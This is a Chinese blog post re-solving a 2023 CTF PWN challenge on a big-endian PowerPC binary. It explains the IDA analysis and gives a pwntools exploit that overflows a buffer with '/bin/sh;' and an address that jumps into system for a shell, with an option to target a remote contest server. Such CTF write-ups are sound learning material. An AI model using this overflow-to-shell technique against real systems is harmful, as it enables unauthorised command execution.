
<!DOCTYPE html>
<html lang="zn-CN">
    <head>
    <!--浏览器搞笑标题-->
        <script type="text/javascript" src="/js/FunnyTitle.js"></script>
        <script type="text/javascript" src="/js/love.js"></script>
        <script src="/js/background.min.js"></script>
        <script src="/js/background.js"></script>
        <link rel="stylesheet" href="/css/cursor.min.css">
        <script src="/js/cursor.min.js"></script>
        <meta charset="UTF-8" />
        <title>2023数字人才_pwn复现 | niky&#39;s Blog</title>
        <meta name="author" content="enicky" />
        <meta name="description" content="一个懵懂小孩的小房间" />
        <meta name="keywords" content="" />
        <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" />
        <link rel="icon" href="/images/avatar.jpg" />
        <script src="https://cdn.staticfile.org/vue/3.2.47/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.3.0/css/all.min.css" />
<link rel="stylesheet" href="/css/fonts.min.css" />
<script> const mixins = {}; </script>

<script src="https://polyfill.io/v3/polyfill.min.js?features=default"></script>


<script src="https://cdn.staticfile.org/highlight.js/11.7.0/highlight.min.js"></script>
<link
    rel="stylesheet"
    href="https://cdn.staticfile.org/highlight.js/11.7.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>


<script src="https://cdn.staticfile.org/KaTeX/0.16.4/katex.min.js"></script>
<script src="https://cdn.staticfile.org/KaTeX/0.16.4/contrib/auto-render.min.js"></script>
<link rel="stylesheet" href="https://cdn.staticfile.org/KaTeX/0.16.4/katex.min.css" />
<script src="/js/lib/math.js"></script>


<script src="/js/lib/preview.js"></script>







<script src="https://cdn.staticfile.org/twikoo/1.6.10/twikoo.all.min.js"></script>



<link rel="stylesheet" href="/css/main.css" />

    <meta name="generator" content="Hexo 6.3.0"></head>
    <body>
        <div id="layout">
            <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存&ensp;浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
            </transition>
            <transition name="into">
            <div id="main" v-show="!loading">
                <nav id="menu" ref="menu">
    <div class="desktop-menu">
        <a class="title" href="/">
            <span>NIKY&#39;S BLOG</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house-chimney fa-fw"></i>
            <span>&ensp;归雁</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;相系</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;归档</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;析构</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;一点惊鸿</span>
        </a>
        
    </div>
    <div id="mobile-menu">
        <div class="curtain" v-show="showMenu" @click="showMenu = !showMenu"></div>
        <div class="title" @click="showMenu = !showMenu">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;NIKY&#39;S BLOG</span>
        </div>
        <transition name="slide">
        <div class="items" v-show="showMenu">
            
            <a href="/">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-house-chimney fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">归雁</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-id-card fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">相系</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-box-archive fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">归档</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-bookmark fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">析构</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-tags fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">一点惊鸿</div>
                </div>
            </a>
            
        </div>
        </transition>
    </div>
</nav>

                <div class="article">
    <div>
        <h1>2023数字人才_pwn复现</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2023/3/29
        </span>
        
        <span class="category">
            <a href="/categories/CTF%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                CTF赛题复现

            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            <span class="tag">
                
                <a href="/tags/CTF-PWN/" style="color: #00bcd4">CTF PWN</a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <p>简单的复现一下前段时间的2023数字人才的那一道pwn题，在比赛的过程还是没有静下心来思考。复现的时候才发现原来这道题目不是很难。</p>
<p>查看一下保护咯，观察到和一般的pwn题附件不一样的格式，开了canary和NX（虽然没点影响体现），注意到是大端存储。</p>
<p>![](X:\桌面记录文件夹\学习记录\内容收集\Snipaste_2023-03-29_19-21-14.png</p>
<p><img src="/post_images/Snipaste_2023-03-29_19-27-55.png" alt="imag">拖入ida查看一下程序（伪代码）基本过程，复现的过程才明白malloc函数是分配一段内存空间（堆上面的），因此v5里面指向的就是堆的地址咯。再看第二处和read函数结合起来就明白第二处是将我们所输入的数据复制到v5指向的地址（堆里面咯）。最后看到第三处，直接转到堆里面了。<img src="/%E3%80%81post_images%E3%80%81Snipaste_2023-03-29_19-21-14.png" alt="imag"></p>
<p>通过观察正好发现有backdoor存在，看到箭头指向的可以发现如果我们让v2存放了需要的<strong>“&#x2F;bin&#x2F;sh”</strong>参数，在backdoor执行结束就获得权限了。</p>
<p><img src="/post_images/Snipaste_2023-03-29_19-29-21.png" alt="imag"></p>
<p><img src="/post_images/Snipaste_2023-03-29_19-58-12.png" alt="imag"></p>
<p>再看system的参数传递和第一次我们输入的过程（read函数），正好我们第一次输入的数据可以操控到system参数传递的<strong>r3寄存器</strong>。于是，题目就直接白给了，我们只需要通过第一次的输入将所需参数输入就可以打通了。</p>
<p><img src="/post_images/Snipaste_2023-03-29_19-58-21.png" alt="imag"></p>
<pre><code class="python">#coding=utf-8
from pwn import *
context(log_level=&#39;debug&#39;)
context.arch = &quot;powerpc&quot;
context.endian = &quot;big&quot;
binary=&#39;./main&#39;
#main_arena = 
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr:io.success(buf+&quot;==&gt;&quot;+hex(addr))
local = 1
if local == 1:
    io=process(binary)
else:
    io=remote(&#39;139.155.86.233&#39;,9999)


pay = b&#39;/bin/sh;&#39;#分号不能忘记
s(pay.ljust(0x28,b&#39;a&#39;)+p32(0x100006f0))#直接到system地址就可以


shell()
</code></pre>
<blockquote>
<p>在用linux命令时候， 我们经常需要同时执行多条命令， 那么命令之间该如何分割呢？</p>
<pre><code>  分号： 顺序地独立执行各条命令， 彼此之间不关心是否失败， 所有命令都会执行。

  &amp;&amp;  ： 顺序执行各条命令， 只有当前一个执行成功时候， 才执行后面的。

    ||   ： 顺序执行各条命令， 只有当前面一个执行失败的时候， 才执行后面的。
</code></pre>
</blockquote>

    </div>
    
    
    
    
    
    
    <div id="comment">
        <div id="twikoo-container"></div>
    </div>
    
    
</div>

                <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2023 niky&#39;s Blog
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;enicky
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/argvchs/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

            </div>
            </transition>
            
            <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
            </transition>
            
        </div>
        <script src="/js/main.js"></script>
        
        



<script>
    twikoo.init({
        el: "#twikoo-container",
        envId: "",
        region: "",
        path: location.pathname,
        lang: "zh-CN",
    })
</script>


        
    </body>
</html>
